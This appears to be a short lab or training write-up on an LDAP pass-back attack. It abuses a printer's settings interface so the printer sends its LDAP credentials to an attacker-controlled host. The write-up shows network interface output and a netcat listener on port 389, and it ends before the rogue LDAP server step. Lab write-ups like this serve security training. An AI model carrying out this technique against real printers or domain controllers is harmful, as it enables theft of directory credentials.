LDAP Pass-back

With the IP in the same segment of the DC and Printer server, we can play with the interface to forgery a request using our port 389 (LDAP):

 ip a
[...]
20: breachad: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 10.50.79.21/26 scope global breachad
       valid_lft forever preferred_lft forever
    inet6 fe80::7e90:4fe9:7284:3b7e/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

Listen with netcat trying to intercept the LDAP connection and retrieve the plain text of the password:

nc -lvp 389

We receive the connection, but no leak of credentials.

So, let's one step forward and create a Rogue LDAP Server.

Last updated